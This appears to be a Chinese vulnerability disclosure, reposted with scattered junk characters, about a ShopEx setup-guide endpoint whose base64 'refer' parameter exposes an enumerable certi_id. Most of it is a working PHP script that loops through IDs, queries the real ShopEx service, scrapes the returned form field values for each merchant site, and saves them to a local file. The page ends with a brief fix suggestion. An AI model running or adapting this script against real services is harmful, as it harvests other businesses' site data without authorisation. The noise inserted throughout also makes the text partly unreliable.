|
|
简要描述:4 U: w. [5 i6 X/ ?/ @
ShopEx某接口缺陷,可遍历所有网站
8 i3 w/ k- x, |详细说明:: ?9 Y) |3 y5 ]6 S! U
问题出现在shopex 网店使用向导页面
% u0 G6 x' e" v, w& z G2 `. W; f2 C0 y
% o6 [" o4 u- F. T: ?
- B V/ \. \# N7 }" Yhttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=) e5 F' g9 G3 s; _4 D# R8 D+ n0 j, S- W
6 L- D/ a. M2 X) n8 [
\! Q) Z! f- y' w |. K3 h
3 f! \& c: [3 W' [, F' i/ q6 brefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
- ]$ Q1 Z4 Y5 q- e
7 H5 A4 e1 D/ U9 x( C' J% f$ }- E5 L7 c# c" Y
' i4 d. G( Y+ P" m0 h- Q% L6 F
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 2 T n; C+ `, I6 B& `9 Z: L) G
2 W: i) g9 P+ d! o2 c- P
. J2 P0 ~- I' A0 ]" h& j/ E. q. L: \5 `( l# u7 P( @+ T
<?php
( F F% ~0 L' H" g9 u6 f* q' Z: k, c/ `" S* Y/ M- @* v
for ($i=1; $i < 10000; $i++) { //遍历 d5 E2 T A9 d2 Y+ Q& A8 N
# L$ K$ d, Z5 E0 M9 u, Q ShowshopExD($i);# ]! U+ F# }( l1 C9 w) c+ \2 K% t
& O/ d; P5 e2 V8 T5 E
}1 F3 a' a- N$ O8 C7 l" ^, S
( r, t, Z& q9 P1 s7 T function ShowshopExD($cid) {8 W x8 A' s3 z; O2 N; i
1 {, ~5 d% ?" J $url='http://guide.ecos.shopex.cn/step2.php';; A3 |$ [) z R. `4 B- _
# K: Q* F) b L $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
2 q j: e3 G! k$ u; ?: x
" ?( @) v) ?/ ]$ p: k+ i $url = $url.'?refer='.$refer;
1 ^ v0 J* E9 O$ z- l6 i/ a- o
1 ~1 l! }8 R x/ m% D$ _/ ] $ch = curl_init($url);: ]& o- N& ?1 @( o! a
& ?2 X2 B7 i: y
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
y& H; {0 u4 {4 m! k( \$ A& Q( }$ d
5 r5 ~% t) a4 p6 k+ @0 U$ m1 J curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;, x( D! u# A1 C5 A4 W( E
; {( Z, ]/ _1 {/ G4 q
$result = curl_exec($ch);
& H) T1 v$ n0 Z; k# E) I$ L
8 Q1 I: Q4 F4 ^# F3 W& ^+ W $result = mb_convert_encoding($result, "gb2312", "UTF-8");
( M$ ]8 m" _' W0 P. O( t/ P& R& S
if(strpos($result,$refer))7 T) k9 a: Y7 u0 V( l0 t
! p" o, k% n* z8 ]6 {5 x; Y! [
{
+ t! a# j8 ~. d9 Z& F. R7 {0 j! z( A( Y% B9 D5 s* o
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件
( I) B& C7 M, e% o4 N# R: r3 }9 k6 K! z5 M; Y( [# w$ O
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
- n" t& e. k3 Q" `& y0 d; P% b) @# V( R# M6 d' n3 ^. M
foreach ($value[1] as $key) {# V& A H# h( @$ n9 {
+ w' |( `& z! i, Y" r/ R preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
9 P7 L8 J2 n& P8 Z" b
& q2 S6 H; n8 j3 u4 s echo $res[1][0].':'.$res[3][0]."\r\n";0 E0 o7 m9 u a% L/ K9 a0 k
0 N j D" e, o7 ?; s2 G1 b6 B: n $col =$res[1][0].':'.$res[3][0]."\r\n";
' @9 C: s i' t. Z* H# ~1 W5 H( J% k: V3 M1 b2 r
fwrite($fp, $col, strlen($col)); ; W8 T2 i# I8 t b: N
7 N; X/ w3 D. _: ?8 Y }
( `% ^! g3 c* I6 {4 K5 t; g" \# T" `0 ]9 U5 t- Z0 _
echo '--------------------------------'."\r\n";
' i5 f* V4 A" z7 Q6 b" y& s) k8 n; \$ J" S
fclose($fp);
1 x9 B, B8 E+ q' | z: [# D) p: H! d! _
}+ O M1 S5 j. c7 D' m' A
+ v( F3 G$ ]0 Y# e/ Y# r flush();
* w" p' F" h6 A, p# {% l+ p3 X! I% K/ A( \
curl_close($ch);
' [: A# v+ @5 C" S* P$ c. d
8 p; v& L3 \: _4 c+ {' D }
% v L& Z; M! m* \ ]
% r; r b: `% |* {?>, h, j) W1 O# w* ~' R
漏洞证明:4 @ g/ _- T3 Y2 q% M
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg0 L# O* T3 @& l
refer换成其他加密方式9 O/ Q+ {- O! [6 F, Y/ E
|
|